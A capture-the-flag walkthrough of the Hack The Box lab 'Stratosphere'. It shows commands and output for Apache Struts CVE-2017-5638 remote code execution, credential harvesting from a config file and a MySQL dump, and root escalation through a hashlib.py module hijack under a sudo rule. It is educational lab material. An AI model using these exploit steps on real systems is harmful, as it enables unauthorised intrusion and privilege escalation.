HTB – Stratosphere

Today we are going to solve another CTF challenge “Stratosphere” which is a lab presented by Hack the Box and is available online for those who want to increase their skills in penetration testing and black box testing. Stratosphere is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: find user.txt and root.txt file in victim’s machine.

WalkThrough

Since these labs are online available therefore they have static IP. The IP of Stratosphere is 10.10.10.64

Let’s start off with scanning the network to find our target.

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# nmap -sV 10.10.10.64
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 15:28 CET
Nmap scan report for 10.10.10.64
Host is up (0.026s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
80/tcp open http
8080/tcp open http-proxy
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.70%I=7%D=1/15%Time=5C3DEE2E%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2
--snip--
SF:-size:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.l
SF:ine\x20{height:1px;background-color:#525D76;border:none;}</style></head
SF:><body>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.90 seconds

As per nmap port 80 is open for HTTP let’s explore the target IP in the browser. After exploring port 80, we was welcomed by following page where we didn’t found any informative clue.

After then we visit Port 8080 for HTTP proxy and here also we get same web page. We try to inspect source code of port 80 and 8080 but we got nothings.

Therefore next we decided to have directory brute force attack with help of Dirbuster and used wordlist “dictionary-list-2.3-medium.txt” for the attack.

Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web browser.

So when we try to open the URL http://10.10.10.64:8080/Monitoring then it gets redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I closely look at the URL containing .action extension, so I made Google search to extract complete information related to this extension. I found action extension is utilized by apache struts2 which has a history of bugs and vulnerabilities and if you will search for its exploit, you will get lot of python scripts and exploits to compromise this service.

c:\PENTEST\NMAP>nmap -p80 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/example/Welcome.action 10.10.10.64
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 17:40 W. Europe Standard Time
Nmap scan report for 10.10.10.64
Host is up (0.021s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2017-5638:
|   VULNERABLE:
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|       Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
|       vulnerability via the Content-Type header.
|
|     Disclosure date: 2017-03-07
|     References:
|       http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|_      https://cwiki.apache.org/confluence/display/WW/S2-045

Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds

So we used above nmap script to identify its state of vulnerability

https://github.com/mazen160/struts-pwn/blob/master/struts-pwn.py

c:\Python27>python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "whoami"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: whoami
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

tomcat8
[%} Done.

c:\Python27>

FwdSh3ll is a tiny open source web-payload oriented exploitation-framework for crafting forward shells.

What is a forward shell? Have you ever been caught in a situation when looking for an approach to a CTF box, you discover an RCE vulnerability in a web app but despite that you can’t get a reverse shell no matter how hard you try due to strictly filtered outbound traffic? A forward shell is a scheme of shell interaction with a vulnerable Linux machine based on the named pipesmechanism.

root@kali:/opt/FwdSh3ll# python3 FwdSh3ll.py

█████▒█ █░▓█████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓ 
▓██ ▒▓█░ █ ░█░▒██▀ ██▌▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ 
▒████ ░▒█░ █ ░█ ░██ █▌░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ 
░▓█▒ ░░█░ █ ░█ ░▓█▄ ▌ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ 
░▒█░ ░░██▒██▓ ░▒████▓ ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
▒ ░ ░ ▓░▒ ▒ ▒▒▓ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ▒ ░ ░ ░ ▒ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ 
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ 

{v0.2}
by Sam Freeside (@snovvcrash)
https://github.com/snovvcrash/FwdSh3ll

[*] Loaded 4 payload(s)

[>] Please enter target URL: http://10.10.10.64/Monitoring/example/Welcome.action
[>] Please enter proxies URL (optional):

[?] Which payload you would like to use?

1. ApacheStruts
2. NodejsExpress
3. ShellShock
4. WebShell

[>] Please enter the number of your choice: 1

[?] Would you like to run a single command or get a forward shell?

1. Single command
2. Forward shell

[>] Please enter the number of your choice: 2

############################## FORWARD SHELL MODE #############################

[*] Session path & ID: /dev/shm/fwdshin.45197
[*] Setting up forward shell on target
[*] Setting up read thread
[*] Press CTRL-C to terminate session

FwdSh3ll> whoami
tomcat8

FwdSh3ll> ls
conf
db_connect
lib
logs
policy
webapps
work

FwdSh3ll>

I also found an exploit Struts-Apache-ExploitPack , lets download it from git hub and give full permission.

root@kali:/opt# git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git
Cloning into 'Struts-Apache-ExploitPack'...
remote: Enumerating objects: 41, done.
remote: Total 41 (delta 0), reused 0 (delta 0), pack-reused 41
Unpacking objects: 100% (41/41), done.
root@kali:/opt# cd Struts-Apache-ExploitPack/Exploiter

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# chmod +x Exploit.sh


Now run the following command to exploit the victim machine.

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# ./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action
Enter Command to execute>ls
conf
db_connect
lib
logs
policy
webapps
work
Enter Command to execute>cat db_connect
[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

So now we have database credential, let’s utilized them for getting all information from inside the database.

Enter Command to execute>mysqldump -u admin -p admin --all-databases --skip-lock-tables
-- MySQL dump 10.16 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: 
-- ------------------------------------------------------
-- Server version 10.1.26-MariaDB-0+deb9u1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `users`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `users` /*!40100 DEFAULT CHARACTER SET utf8mb4 */;

USE `users`;

--
-- Table structure for table `accounts`
--

DROP TABLE IF EXISTS `accounts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `accounts` (
`fullName` varchar(45) DEFAULT NULL,
`password` varchar(30) DEFAULT NULL,
`username` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `accounts`
--

LOCK TABLES `accounts` WRITE;
/*!40000 ALTER TABLE `accounts` DISABLE KEYS */;
INSERT INTO `accounts` VALUES ('Richard F. Smith','9tc*rhKuG5TyXvUJOrE^5CK7k','richard');
/*!40000 ALTER TABLE `accounts` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-01-15 9:16:38
Enter Command to execute>
root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# ssh richard@10.10.10.64
The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
richard@10.10.10.64's password: 
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
richard@stratosphere:~$ ls
Desktop test.py user.txt
richard@stratosphere:~$ cat user.txt
e61*****36b

richard@stratosphere:~$ sudo -l

Matching Defaults entries for richard on stratosphere:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
richard@stratosphere:~$ echo 'import os;os.system("/bin/bash")' > hashlib.py
richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
root@stratosphere:/home/richard# id
uid=0(root) gid=0(root) groups=0(root)
root@stratosphere:~/Desktop# cd /root
root@stratosphere:~# cat root.txt
d41*****27e
root@stratosphere:~#

Running sudo -l reveals that richard is able to run /usr/bin/python* /home/richard/test.py,
however richard does not have write permissions for the script.
Examining the script shows that hashlib is imported. By creating hashlib.py in the same directory,
python will import this module instead of the real hashlib and execute the contents. Therefore I create a hashlib.py script in the current directory to import system binary ‘/bin/bash’ and hence now when we will run test.py then it will import hashlib.py which will calls /bin/bash binary file.

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *